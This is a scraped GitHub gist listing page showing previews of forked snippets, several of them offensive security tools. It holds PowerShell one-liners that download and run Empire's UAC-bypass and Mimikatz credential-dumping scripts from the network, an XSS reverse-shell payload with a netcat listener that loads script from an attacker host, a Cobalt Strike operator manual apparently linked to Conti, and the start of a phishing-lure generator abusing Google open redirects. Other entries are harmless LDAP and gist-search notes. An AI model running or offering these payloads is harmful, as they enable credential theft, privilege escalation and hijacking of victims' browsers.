| title | author | date | source | notoc |
|---|---|---|---|---|
LDAP Search Filter Cheatsheet |
Jon LaBelle |
January 4, 2021 |
true |
filipesam
filipesam
/ SystemCMD.cpp
Created
April 11, 2024 08:16
— forked from masthoon/SystemCMD.cpp
Launch SYSTEM CMD in user current session (from a service)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #include <windows.h> | |
| #include <Winbase.h> | |
| #include <Wtsapi32.h> | |
| #include <Userenv.h> | |
| #include <malloc.h> | |
| #pragma comment(lib, "Wtsapi32.lib") | |
| #pragma comment(lib, "Userenv.lib") |
filipesam
/ RedTeam_CheatSheet.ps1
Created
October 13, 2023 12:38
— forked from jivoi/RedTeam_CheatSheet.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
filipesam
/ cs-manual-conti.sh
Created
August 23, 2023 10:57
— forked from insi2304/cs-manual-conti.sh
CS manual Conti
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| MANUAL COBALT STRIKE | |
| !------------------------------------------------- --Standard Commands---------------------------------------------- -----! | |
| Creating a load | |
| Attacks->Packages-> | |
| interact - choose an agent | |
| help -> will show a list of commands | |
| help [command] will show help for a specific command | |
filipesam
/ xss_shell.txt
Created
August 2, 2023 08:52
— forked from ivanvza/xss_shell.txt
XSS Reverse Shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done | |
| Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)> |
filipesam
/ ldap_search_filter_cheatsheet.md
Created
July 14, 2023 13:24
— forked from jonlabelle/ldap_search_filter_cheatsheet.md
LDAP Search Filter Cheatsheet
filipesam
/ Search my gists.md
Created
July 13, 2023 14:54
— forked from santisbon/Search my gists.md
How to #search gists
Enter this in the search box along with your search terms:
Get all gists from the user santisbon.
user:santisbon
Find all gists with a .yml extension.
extension:yml
Find all gists with HTML files.
language:html
filipesam
/ Red-Teaming-tool.md
Created
March 27, 2023 16:46
— forked from z0rs/Red-Teaming-tool.md
filipesam
/ Cplapplet.cpp
Created
January 29, 2023 14:26
— forked from reigningshells/Cplapplet.cpp
DllMain template to execute code in a .cpl file which is just a renamed DLL that exports a function CplApplet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // dllmain.cpp : Defines the entry point for the DLL application. | |
| #include "pch.h" | |
| #include <Windows.h> | |
| extern "C" __declspec(dllexport) LONG CplApplet() | |
| { | |
| MessageBoxA(NULL, "Replace this message box with something more interesting...", "Control Panel", 0); | |
| return 1; | |
| } |
filipesam
/ ldapsearch_test_results.md
Created
December 29, 2022 14:14
— forked from tscherf/ldapsearch_test_results.md
MS ADV190023
Signing
simple bind over insecure channel
# ldapsearch -xLLL -H ldap://ad1.win2016.test -b 'DC=win2016,DC=test' -D 'CN=Administrator,CN=Users,DC=win2016,DC=test' -W samaccountname=Administrator DN
Enter LDAP Password:
ldap_bind: Strong(er) authentication required (8)
additional info: 00002028: LdapErr: DSID-0C090256, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v3839
filipesam
/ google_lure.py
Created
December 1, 2022 17:19
— forked from ustayready/google_lure.py
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from __future__ import print_function | |
| import pickle | |
| import os.path | |
| from googleapiclient.discovery import build | |
| from google_auth_oauthlib.flow import InstalledAppFlow | |
| from google.auth.transport.requests import Request | |
| from apiclient import errors | |
| import re | |
| from bs4 import BeautifulSoup as Soup |
NewerOlder